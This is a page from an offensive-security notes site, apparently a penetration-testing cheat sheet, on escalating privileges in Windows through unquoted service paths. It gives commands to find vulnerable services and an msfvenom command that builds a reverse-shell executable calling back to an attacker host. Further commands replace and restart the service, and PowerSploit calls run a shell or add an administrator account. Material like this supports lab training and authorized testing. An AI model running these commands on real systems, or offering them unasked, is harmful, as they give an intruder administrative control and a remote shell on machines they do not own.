Hack$Notes
  • Hack$Notes
  • Enumeration
    • NMAP Scanning
    • Hping3 Scanning
      • IDLE SCAN
    • DNS Enum
    • SMB Enum
    • SMTP Enum
    • POP3
    • SNMP Enum
    • LDAP Enum
    • HTTP Enum
      • CheckList
    • FTP Enum
    • SSH Enum
    • MySQL Enum
    • Oracle Enum
    • NFS Enum
    • Internet Relay Chat (IRC)
    • Telnet
    • Kerberos
    • Finger
    • Ports Open/Close
    • ident
    • Postgresl
  • Transferring Files
  • Metasploit Framework
    • Msfvenom tutorial
    • Msfvenom Payloads
  • Reverse Shells
  • Buffer Overflow
    • B.O Steps
    • SLmail B.O
  • Spawning a Shell
  • Password Attacks
    • Passing the Hash
    • SAM/SYSTEM
    • Passwords
    • Hydra
    • Medusa
    • Ncrack
    • Unshadow
    • Hashcat
    • John The Ripper
    • fcrackzip
  • Privilege Escalation
    • Windows
      • Kernel Exploits
      • Stored Credentials
      • Unquoted Service Path
      • Always Install Elevated
      • Weak Permissions
      • Schedule Tasks
      • AutoRun Executables
      • Startup Apps
      • Passwords
      • Win PrivEsc Tools
    • Linux
      • Kernel Exploits
      • Service Exploits
      • PATH Variable
      • SUID/GUID files
      • CronJobs
      • Sudo
      • Custom Executable
      • Linux PrivEsc Tools
  • Port Forwarding
  • Tools / Techniques
    • General Check List
    • Misc. Commands
    • Steganography
    • Evasion Techniques
    • SQL Injection Payloads
    • LFI / RFI
    • Recover contents
    • JAR Files
    • Strace/Ltrace
    • Port Knocking
    • Screenshots in Kali
    • Curl
  • Resources
    • Books
    • Links
Powered by GitBook
On this page
  • Search for Unquoted Path
  • Create an executable msfvenom payload
  • Replace and restart service.
  • Powersploit

Was this helpful?

  1. Privilege Escalation
  2. Windows

Unquoted Service Path

Search for Unquoted Path

The following command will search for all the paths except "C:\windows" since a normal user will not have executable permissions on this folder. 

##  Windows Management Instrumentation Command-Line (WMIC)  ##
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

##  WMI (Powershell) ##
Get-WmiObject win32_service | select Name,PathName,StartMode,StartName | where {$_.StartMode -ne "Disabled" -and $_.StartName -eq "LocalSystem" -and $_.PathName -notmatch "`"" -and $_.PathName -notmatch "C:\\Windows"} | Format-List

If a service is found with unquoted path check the permissions of the service with icacls. If we have permissions on any of the folders that leads to the executable then we can escalate our privileges.

Create an executable msfvenom payload 

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.20 LPORT=443 -f exe > /root/same_service_name_as_above.exe

Replace and restart service. 

sc stop service_name
sc start service_name

Powersploit

Within powershell run the following. 

# Find them
Get-ServiceUnquoted

# Execure a reverse shell or adding new user as administrator.
Write-ServiceBinary -name "Service_Name" -Path "C:\Service_name.exe"
PreviousStored CredentialsNextAlways Install Elevated

Last updated 1 year ago

Was this helpful?